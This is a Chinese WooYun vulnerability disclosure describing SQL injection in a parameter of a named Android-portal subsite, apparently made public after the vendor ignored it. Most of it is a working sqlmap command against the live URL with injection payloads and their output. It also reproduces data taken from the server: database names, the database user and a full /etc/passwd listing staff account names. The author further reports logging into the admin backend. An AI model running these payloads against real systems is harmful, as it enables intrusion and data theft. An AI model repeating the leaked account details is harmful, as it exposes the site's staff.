当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045088

漏洞标题:安卓中国#某分站存在SQL注射导致后台沦陷

相关厂商:安卓中国

漏洞作者: Mr.leo

提交时间:2013-12-06 11:39

修复时间:2014-01-20 11:39

公开时间:2014-01-20 11:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

安卓中国#某分站存在SQL注射导致后台沦陷

详细说明:

站点:
http://coolpad.anzhuo.cn
注入点:
mt参数没有过滤,导致注射
sqlmap.py -u "http://coolpad.anzhuo.cn/rank.php?keyword=&mt=1" -p "mt" --dbs --current-user --current-db
[root@Hacker~]# Sqlmap sqlmap.py -u "http://coolpad.anzhuo.cn/rank.php?keyword=&
mt=1" -p "mt" --dbs --current-user --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:36:52
[09:36:53] [INFO] resuming back-end DBMS 'mysql'
[09:36:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: mt
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=&mt=1 AND 1460=1460
Type: UNION query
Title: MySQL UNION query (NULL) - 25 columns
Payload: keyword=&mt=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a776f633a,0x5747
4e574b79737a4668,0x3a646a673a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NU
LL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: keyword=&mt=1 AND SLEEP(5)
---
[09:36:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.9
back-end DBMS: MySQL 5.0.11
[09:36:53] [INFO] fetching current user
current user: 'anzhuovoteuser@localhost'
[09:36:53] [INFO] fetching current database
current database: 'anzhuovote'
[09:36:53] [INFO] fetching database names
available databases [56]:
[*] android_rom
[*] anzhuoblog
[*] anzhuouucenter
[*] anzhuovote
[*] gobbs
[*] information_schema
[*] mail_system
[*] mysql
[*] talkphone
[*] test
[*] testultrax
[*] ultrax
[*] ultrax20120725
[*] ultrax20130523
萝卜

1236.png


etc/password
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
jb_backup:x:500:100::/home/jb_backup:/sbin/nologin
jb-zhgao:x:501:100::/home/jb-zhgao:/bin/bash
jb_task:x:502:100::/home/jb_task:/sbin/nologin
jb_share:x:503:100::/home/jb_share:/sbin/nologin
jb-hhliu:x:504:100::/home/jb-hhliu:/bin/bash
jb-wqzeng:x:505:100::/home/jb-wqzeng:/sbin/nologin
jb-xwyu:x:506:100::/home/jb-xwyu:/sbin/nologin
jb-sjliu:x:507:100::/home/jb-sjliu:/bin/bash
jb-xszhang:x:508:100::/home/jb-xszhang:/sbin/nologin
jb-dbchen:x:510:100::/home/jb-dbchen:/sbin/nologin
zabbix:x:512:512::/home/zabbix:/sbin/nologin
mysql:x:513:513::/home/mysql:/sbin/nologin
www:x:514:514::/home/www:/sbin/nologin
jb-xiaohu:x:515:100::/home/jb-xiaohu:/sbin/nologin
jb-wlyin:x:516:100::/home/jb-wlyin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
anzhuo_test:x:519:50::/data/www/anzhuo/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
anzhuo_ftp_cmod:x:521:50::/data/anzhuo/data/attachment/CMOD_RIDER/:/sbin/nologin
anzhuo_ftp_dark:x:522:50::/data/anzhuo/data/attachment/dark/:/sbin/nologin
jb-jinjliu:x:523:100::/home/jb-jinjliu:/bin/bash
jb-wulian:x:524:100::/home/jb-wulian:/bin/bash
nagios:x:525:525::/home/nagios:/sbin/nologin
jb-jhgu:x:526:100::/home/jb-jhgu:/sbin/nologin
jb-gengyuwei:x:527:100::/home/jb-gengyuwei:/bin/bash
后台密码1分站之前已经被人改了(网站管理员or白帽子?) 幸好我截图了。。。。
截取一张成功登录的界面和用户名密码,md5可查

345.png


678.png


over

漏洞证明:

available databases [56]:
[*] android_rom
[*] anzhuoblog
[*] anzhuouucenter
[*] anzhuovote
[*] gobbs
[*] information_schema
[*] mail_system
[*] mysql
[*] talkphone
[*] test
[*] testultrax
[*] ultrax
[*] ultrax20120725
[*] ultrax20130523

修复方案:

1#修复注射漏洞
2#屏蔽管理后台对外

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝